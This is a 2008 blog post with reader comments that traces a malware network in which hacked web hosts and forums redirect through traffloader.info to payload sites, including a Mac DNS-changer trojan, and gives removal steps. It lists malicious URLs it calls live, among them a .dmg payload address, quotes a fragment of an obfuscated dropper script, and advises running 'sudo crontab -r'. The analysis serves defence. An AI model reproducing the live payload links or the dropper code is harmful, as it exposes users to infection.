Note: Followup to this entry at http://tacit.livejournal.com/240750.html
So apparently, Macintosh users are now the targets of Eastern European organized crime.
First, a bit of backstory. Last December, I wrote an article about how I had done a Google search for my name and uncovered a massive hacking attack against a Web hosting company called iPowerWeb. iPower, a company in Phoenix, Arizona, has trouble securing their Web servers, and Russian organized crime can hack any Web site hosted by iPower completely at will.
That was last December. Today, as I write this, iPower still has not fixed their server security; each day, a whole crop of new Web sites hosted by iPower is hacked, and the hackers plant redirectors on the site that are designed to snare unwary visitors and send them to servers in Eastern Europe that attempt to infect users with computer viruses.
For the past couple of months, I have been emailing iPower every day with new lists of hacked Web sites they're hosting. Each day, I bug them to fix their computer security. Each day, they remove the virus redirectors that I tell them about, but they do not fix their server security; so the next day, more of their Web sites are hacked. Some poor sots who host Web sites with iPower have had their sites hacked over and over again.
In the past 48 hours, the nature of the hacks has changed. Between December and now, the hacks were all the same: the hackers would penetrate an iPower Web site, create a directory on the site named /her, create a directory on the site named /bad, and then create a directory with a one- or two-digit number as a name. The redirector pages would go in the numbered directory. This made spotting hacked iPower Web sites trivially easy.
About two days ago, the hackers began changing the naming scheme of the directories. This led me on a path to discovering an entire network of compromised Web sites, feeding into an elaborate underground network of computers used to distribute computer viruses.
And they're distributing Mac viruses now, too.
If you haven't read the earlier post that I linked to above, now would be a good time to do so. It's OK, I'll wait.
Back? Good. Until a couple days ago, finding the hacked sites on iPower was a breeze, because the directory structure was always the same and the hackers used the same keywords to try to poison Google searches. Now, however, the hackers have changed the naming structure of the directories, and they are no longer using the same keywords to try to snare Google searches. They're not using my name often any more, for example.
They are using a number of sex- and porn-related keywords, though, some of which are very unusual. The Google cache of hacked iPower Web sites provides an easy way to compile lists of words and phrases that are common to all the hacked sites, and searching on Google for these words and phrases yields a treasure trove of Web sites that have been hacked.
Interestingly, these words and phrases also show up in many, many forum posts, almost all of them on forums running phpBB or phpNuke software, and invariably old, insecure versions of this software.
It also produces lists of domains with strange names, such as http://6.bgmww-news.info and http://3.vxwzj-news.info.
WARNING *** WARNING *** WARNING
The links here and elsewhere in this post are live. As of the time of this writing, they redirect to active virus distributors which can and will infect unpatched Windows computers, and in one case will try to infect Mac computers, with a virus. DO NOT click on these links if you don't know what you're doing. DO NOT allow any of these sites to download or install software onto your computer.
So we see a pattern: certain words and phrases, appearing over and over again in hacked Web sites hosted by iPowerWeb, and also appearing in messages placed on hacked phpBB and phpNuke forums, and also appearing in domains with strange names.
In each case, visiting one of the hacked iPower Web sites, reading one of the messages in a hacked forum, or visiting one of the strange domains does the same thing. And, interestingly, it reveals an elaborate network of computers all intended to transmit viruses while obscuring the source of the viruses. Ready to go down the rabbit hole? Here we go!
The central linchpin of the entire network is a site called traffloader.info. Traffloader.info is a Web site hosted by an outfit called leaseweb.com (Edit: As of April 8, 2008, traffloader.info is off Leaseweb and is now being hosted in Moldova), which also hosts the sites with strange domains. If you visit traffloader.info in your browser, you'll see nothing but a blank page; it sends back no HTML code at all. There appears to be nothing there.
But all the hacked iPower Web sites, all the messages placed on hacked forums, and all the strange domains hosted by leaseweb.com redirect to traffloader.info. Specifically, they redirect to a script on traffloader.info called "go.php". Here's how it works.
A person does a Google search for certain common, popular keywords. It might be my name, or "free sex movies," or "build ultralight helicopters"--they create hundreds of thousands of lists of popular keywords, which they place on hacked Web sites, into hacked message board posts, or onto domains they either create or hack.
The person sees one of the attack pages in Google and clicks on the Google result. The page or message board post redirects the user to http://traffloader.info/go.php, and usually includes information about where the user came from, presumably so the hackers can tell which particular hacked sites are most effective. The information passed to the script varies, but often includes the name of the hacked site the user came from, and the Google keywords used.
Traffloader.info then redirects the user to any one of a bunch of other sites. These other sites might look like porn sites, and try to download a virus disguised as movie player software. They might look like virus scanner sites, and try to download a virus disguised as antivirus software. Sometimes, the sites have embedded iframes or redirectors that will try to download additional files to the user's computer.
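The first hop in that chain is the one you can hunt for in bulk: every hacked page, forum post or throwaway domain has to carry some construct that sends the visitor to traffloader.info/go.php. The following is an added example written for this page, not code from the original post; it pulls redirect targets out of fetched HTML (meta refresh, iframe src, and the usual JavaScript location assignments) and decodes the query string that go.php receives. The parameter names in the constructed sample (site, q) are assumptions; the post only says go.php is told which hacked site and which search keywords the visitor came from.

```javascript
// Added example (not from the original post): find redirect constructs in a
// fetched page and flag those that funnel to traffloader.info/go.php.
// Parameter names in the sample are assumed; the post only says go.php
// receives the referring site and the Google keywords.

const REDIRECT_HUB = 'traffloader.info';

// Returns [{kind, url}] for every redirect-like construct found in `html`.
// Relative targets are resolved against `baseUrl` (the hacked page's URL).
function findRedirects(html, baseUrl = 'http://example.invalid/') {
  const found = [];
  const push = (kind, raw) => {
    const cleaned = raw.trim().replace(/^["']|["']$/g, '');
    try {
      found.push({ kind, url: new URL(cleaned, baseUrl).href });
    } catch (e) {
      // Unparsable target: keep the raw string so nothing is silently dropped.
      found.push({ kind, url: cleaned });
    }
  };

  // <meta http-equiv="refresh" content="0; url=http://...">
  const meta = /<meta[^>]+http-equiv\s*=\s*["']?refresh["']?[^>]*content\s*=\s*["']([^"']*)["']/gi;
  for (const m of html.matchAll(meta)) {
    const urlPart = m[1].split(/;\s*url\s*=/i)[1];
    if (urlPart) push('meta-refresh', urlPart);
  }

  // <iframe src="..."> (hidden 1x1 iframes are the classic dropper carrier)
  const iframe = /<iframe[^>]+src\s*=\s*["']([^"']+)["']/gi;
  for (const m of html.matchAll(iframe)) push('iframe', m[1]);

  // location.href = '...'; window.location = "..."; location.replace('...')
  const js = /(?:window\.|document\.|top\.)?location(?:\.href)?\s*(?:=\s*|\.replace\s*\(\s*)["']([^"']+)["']/gi;
  for (const m of html.matchAll(js)) push('javascript', m[1]);

  return found;
}

// Keeps only the hits that go to the hub and decodes go.php's query string,
// which is what tells you which hacked site and keywords were being tracked.
function hubRedirects(html, baseUrl) {
  return findRedirects(html, baseUrl)
    .filter(r => { try { return new URL(r.url).hostname === REDIRECT_HUB; } catch (e) { return false; } })
    .map(r => {
      const u = new URL(r.url);
      return { kind: r.kind, path: u.pathname, params: Object.fromEntries(u.searchParams) };
    });
}

// Constructed sample page, modelled on the post's description; not a real capture.
const SAMPLE_HACKED_PAGE = `
<html><head><title>free sex movies</title>
<meta http-equiv="refresh" content="0; url=http://traffloader.info/go.php?site=victim.example&q=free+sex+movies">
</head><body>
<script>if (document.referrer.indexOf('google') != -1) { window.location = 'http://traffloader.info/go.php?site=victim.example&q=free+sex+movies'; }</script>
<iframe src="/her/bad/12/index.html" width="1" height="1"></iframe>
</body></html>`;

// Usage: node this file, or call hubRedirects(pageHtml, pageUrl) on a saved copy
// of a suspect page fetched with a tool that does not execute scripts.
console.log(hubRedirects(SAMPLE_HACKED_PAGE, 'http://victim.example/'));
```

Run it against a saved copy of a page rather than a live browser; the point of the regex approach is that nothing in the page gets executed. Pages that build the redirect with obfuscated JavaScript will slip past the third pattern, which is why the decoder example later on this page is the natural companion to this one.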
I've spent hours tracing the way the system works. Here's a bird's eye overview:

A user clicks on a Google search that leads to a hacked iPower site, a hacked forum post, or a domain hosted by leaseweb.com. The user is redirected to traffloader.info, which records information about where the user came from and what keywords he used. The script at traffloader.info then sends the user to a site such as
adult-youtube-8.com/freemovie/234/0
or
xpantivirus.com/2008/3/_freescan.php
which attempts to download a virus.
The site that the user ends up on seems to be chosen more or less at random (at least if there's a system behind it, I haven't been able to figure out what that system is yet). Some of the sites are more sophisticated than others; some of the sites redirect the user to other sites. For example, traffloader.info will sometimes send the user to a script hosted at chillyclips.com/movie1.php which will in turn send the user to movstube.com/movie1.php.
Now, movstube.com is a particularly interesting payload site. Unlike all the other sites, it attempts to attack both Mac and Windows machines; all the other sites host Windows-specific attacks.
The script at movstube.com checks the browser's "user agent". For folks who don't know a lot about how browsers work, each time your Web browser accesses a Web site, it tells the site what it is and what kind of computer you have. When you go to a Web site, your browser might say "Hi there! I'm Internet Explorer 7 running on Windows XP" or "Hello! I'm Safari running on an Intel Mac".
The script at movstube.com looks at this user agent. If it sees a Windows user agent, it attempts to download a Windows virus pretending to be movie viewer software, just like many of the other sites do.
But...
But if the script sees a Mac user agent, it sends the browser to
http://64.28.178.27/download/1023.dmg
The file 1023.dmg is a Macintosh disk image file. It contains an installer that attempts to install a piece of Mac malware variously called OSX/DNSChanger or OSX.RSPlug.A. This is a Trojan horse that attempts to modify the Mac's domain name server settings so that a Mac user who surfs the Web can be secretly redirected to sites controlled by the Russian malware writers, without knowing it.
The good news is that the Mac malware can not infect a computer without help. You must choose to install it and you must type your administrator password in order to be infected. The bad news: clearly, the Mac is now on the radar of malware writers.
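Because movstube.com branches on the User-Agent header, a single visit only ever shows you one payload; to see what each kind of visitor gets, the chain has to be walked once per browser string, without letting the client follow redirects on its own. The following is an added example for this page, not code from the post: a redirect-chain walker that takes a fetch function, so it can be pointed at a real HTTP client or, as here, at a constructed stand-in for the chillyclips.com to movstube.com to payload hops described above. The stand-in's branching logic and the Windows file name are assumptions; the hostnames and the 1023.dmg URL are the ones the post reports. No real site is contacted.

```javascript
// Added example (not from the original post): walk a redirect chain once per
// User-Agent and report where each browser lands. fetchFn(url, userAgent) must
// return {status, headers: {location?}} WITHOUT following redirects itself.

const MAX_HOPS = 10;

// Returns the ordered list of URLs visited and why the walk stopped.
function followChain(startUrl, userAgent, fetchFn) {
  const hops = [startUrl];
  const seen = new Set([startUrl]);
  let current = startUrl;
  for (let i = 0; i < MAX_HOPS; i++) {
    const resp = fetchFn(current, userAgent);
    const loc = resp.headers && resp.headers.location;
    if (resp.status < 300 || resp.status >= 400 || !loc) {
      return { hops, stop: 'landed', status: resp.status };
    }
    // Location may be relative; resolve it against the URL that sent it.
    const next = new URL(loc, current).href;
    if (seen.has(next)) return { hops: [...hops, next], stop: 'loop', status: resp.status };
    seen.add(next);
    hops.push(next);
    current = next;
  }
  return { hops, stop: 'max-hops' };
}

// Probe one entry point with several browsers; final URL and hop count per UA.
function probe(startUrl, agents, fetchFn) {
  const out = {};
  for (const [name, ua] of Object.entries(agents)) {
    const r = followChain(startUrl, ua, fetchFn);
    out[name] = { final: r.hops[r.hops.length - 1], stop: r.stop, hops: r.hops.length };
  }
  return out;
}

// Period-appropriate User-Agent strings (constructed, but representative).
const AGENTS = {
  ie7: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)',
  safari: 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5; en) AppleWebKit/525 Safari/525',
  firefoxLinux: 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Firefox/2.0',
};

// Constructed stand-in for the live chain. Hostnames and the .dmg URL come
// from the post; the Windows file name and exact branching are ASSUMED.
function fakeFetch(url, ua) {
  const u = new URL(url);
  const redirect = to => ({ status: 302, headers: { location: to } });
  if (u.hostname === 'chillyclips.com') return redirect('http://movstube.com/movie1.php');
  if (u.hostname === 'movstube.com' && u.pathname === '/movie1.php') {
    if (/Macintosh/.test(ua)) return redirect('http://64.28.178.27/download/1023.dmg');
    if (/Windows/.test(ua)) return redirect('/download/codec.exe'); // assumed name
    return { status: 200, headers: {} };                            // plain page for others
  }
  return { status: 200, headers: {} }; // payload hosts: stop here, never download
}

// Usage:
console.log(probe('http://chillyclips.com/movie1.php', AGENTS, fakeFetch));
```

To use it against a live chain, supply a fetchFn that issues a HEAD or GET with redirects disabled and returns the status and Location header; the hop limit and loop check matter there, because these networks routinely bounce visitors through cycles of rotating domains.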
Some of the sites in the network controlled by traffloader.info are believed or known to be associated with the Russian Business Network, an organized group of Eastern European criminals. The fact that the attacks on iPower use payload sites known or believed to be controlled by RBN suggests strongly that RBN is behind the iPower hacks. It also suggests strongly that RBN is either responsible for or associated with the people responsible for the Mac malware.
I first notified iPower that their Web server security had been breached last December. As of today, there are still new hacked sites appearing on their servers daily.
The whois information shows something very interesting, as well. All of these domains associated with virus distribution -- traffloader.info, movstube.com, xpantivirus.com, chillyclips.com, magicporntube.com, and so on -- every one, without exception, is registered through the same registrar: a place called estdomains.com. Each of these Web sites is known to be associated with virus distribution on behalf of organized crime, yet each of them is still active and resolving, and each has the same registrar.
Yep, that's estdomains.com: the choice of organized crime.
Comments
Now, the question is: what can IPowerWeb (and other hosts) do to fix their security?
How can other hosts be affected by the same kinds of problems?
I have my own theories, here.
-Dan
The owners of phpBB and phpNuke sites need only update their software as new patches come out; the phpBB systems that have been compromised in particular are generally running very old versions of phpBB, and in a lot of cases the sites seem to have been abandoned entirely.
At this point, given that no ISP save for iPower seems to have suffered the large-scale, systematic breach iPower has encountered, I am beginning to believe that someone within iPower is responsible for, or at least complicit in, the attack.
The "scripts" here are PHP scripts living on the servers, not Javascripts that are run inside the browser; disabling Javascript in Firefox won't prevent a server-side PHP script from running.
The virus dropper Web sites attempt a number of different exploits, mostly targeted at Explorer vulnerabilities. I don't know if they target Firefox vulnerabilities; I haven't analyzed their behavior using Firefox. In any event, if the attempted exploits don't work, the virus droppers try to trick you into downloading the virus manually; this is a social engineering attack and it doesn't matter what browser you use.
Edited at 2008-03-26 07:41 pm (UTC)
Seems a rather 2-bit operation, though. Makes sense to add people who know each other, since that's how trust-based things like LJ (and Google) work, but why only 200? Why not 2000?
For those who may not know; the trick it's using right now is posting a "podcast video" with a spinning line wheel in the center, imitating "video loading" from YouTube; if you click on the supposed "stop" button it takes you to the new site. The entire thing is only an image which is hiding the link.
Edited at 2008-03-26 10:31 pm (UTC)
The Mac version of this malware can not infect you if you do not type your password. However, if you're still nervous, there's an easy way to check for it.
Open your hard drive. On the top level of your hard drive, you will see a folder called Library. Open it. Inside, look for the folder called Internet Plugins. Open the Internet Plugins folder and see if you can find a file called plugins.settings; if you can, you are infected and if you can't you are not.
If you are infected:
1. Drag the plugins.settings file to the trash and empty the trash.
2. Open the Terminal. It is in your Applications folder, in a folder called Utilities.
3. In the Terminal window, type
sudo crontab -l
and hit return. (Note, the thing after the dash is the lowercase letter L, not the number 1.) You will be asked for an administrator password. Enter it.
4. If it says "crontab: no crontab for root" when you enter your password, you are no longer infected and you can stop here. If it says anything else besides "crontab: no crontab for root" then go on to the next step.
5. Type
sudo crontab -r
in the terminal and press Return. When you are asked for your password, enter it.
6. Restart your Mac. That should take care of it.
I'm currently running my damn-near-bulletproof investigatory DreamLinux 2, having a look at page sources and such.
It shouldn't be too hard to get the physical location of these servers, I don't think.
how in the world do you have time for your LIFE???!!!???
Nice penguin, *good* penguin!
I was reading a lot about Russian and Chinese networks being completely hard-to-track networks, as they seem like the Wild West (no law). We also noticed Turkish AIH networks as potentially damaging networks, but leaseweb.com seems to be an Amsterdam network. I can't understand why a European network like that can have that kind of stuff and allow that kind of hosts on their networks. Do we have here another potential network like the RBN / CN or AIH networks? Are leaseweb.com aware of this kind of criminal issue? More to the point, are they intentionally allowing this kind of exploit???
I need to know if there is a relationship between the RBN networks, CN, AIH, and leaseweb.com. Can we confirm this point?
Good job with the explanation. I was little bit confused with the complexity but now i see it clear...
Do you know which people can be involved on such things like this? any hackers group behind? any fake "security company"?
I would like if there's somebody who can give as much information of their observations as they can to be prepared and to allow us to defend ourselves from this hustlers....
Thanks again and Good Job !
I got more info; can anyone make sense of this code:
??
(I modified the index.html reply on rabegin-dot-cn/fel, which looked like this:
but changed the annoying, meaningless unknown letters to more comfortable names (a function named ivcmkcvztzt is now called fun1, and so on). Maybe a web developer can explain to us what it does?
Also I noticed something strange: this virus dropper web also has another entry point, same IP address but with a different host header; it has an index.html login and password page:
http://lotrain.cn
Maybe a control panel for the virus dropper host?
What do you think about it?
I have now changed the script tag to a $cript tag, for to f0r, and < to #minorthan#, so that it isn't treated as code; I hope it works:
Malicious code:
<$cript type="text/javascript">
function ivcmkcvztzt(utxqdyryr){
var tgywcyqbsz="";
f0r(kokecbksrt=0;kokecbksrt#minorthan#ut
tgywcyqbsz+=(String.fromCharCode(parseIn
}
document.write(tgywcyqbsz);
}
ivcmkcvztzt("");
Easy to understand code:
<$cript type="text/javascript">
function fun1(param4fun1){
var var1="";
f0r(increment1=0;increment1#minorthan#pa
var1+=(String.fromCharCode(parseInt(para
}
document.write(var1);
}
fun1("");
I hope this works now.
Regards, and sorry for this; I'm not so comfortable with this stuff :-)
RCB
So anyway, I did the thing in Terminal and it showed I was infected, and then I followed your instructions and it said the "no crontab" thing, so it should mean I'm clean. Is there any way that this program is still operating on my computer, and is there anything more I should do to ensure it's gone?
Thanks for allowing idiots and computer illiterates like myself to post here and ask for help.
This malware does not attempt to spread itself or email or IM any of your contacts.
If you are not showing the signs of malware infection any more, you're good to go. :)
Help? x.x;
However, for peace of mind, I would recommend running an online antivirus scanner, such as the one at
http://housecall.trendmicro.com
Like a fool, I downloaded the malware, and I found that I had been infected.
However, I am now disinfected following your instructions, thank God.
I am very grateful.
*bookmarked*
I tried crontab; it showed "no crontab for root", but I think I was logged in as root/admin.
I don't see a plugins.settings file in the plug-ins folder either.
Any help?
New Safari update + restart has not corrected the problem.
There are a few things you can do to resolve problems with Safari not showing movies:
1. Re-download and re-install QuickTime. You can find the download page here.
2. Install Flip4Mac, which allows Safari to play Windows (.wmv and .avi) movies. You can find the Flip4Mac download here.
3. Re-install the Flash player plugin; you need this to view Flash movies. You can find it here.
It's affecting my search results and when I click on some links it's directing me to to their dumbass sites.
Could someone please tell us how to remove 1023.dmg
Thanks
If you are infected:
1. Drag the plugins.settings file to the trash and empty the trash.
2. Open the Terminal. It is in your Applications folder, in a folder called Utilities.
3. In the Terminal window, type
sudo crontab -l
and hit return. (Note, the thing after the dash is the lowercase letter L, not the number 1.) You will be asked for an administrator password. Enter it.
4. If it says "crontab: no crontab for root" when you enter your password, you are no longer infected and you can stop here. If it says anything else besides "crontab: no crontab for root" then go on to the next step.
5. Type
sudo crontab -r
in the terminal and press Return. When you are asked for your password, enter it.
6. Restart your Mac. That should take care of it.
Thanks everyone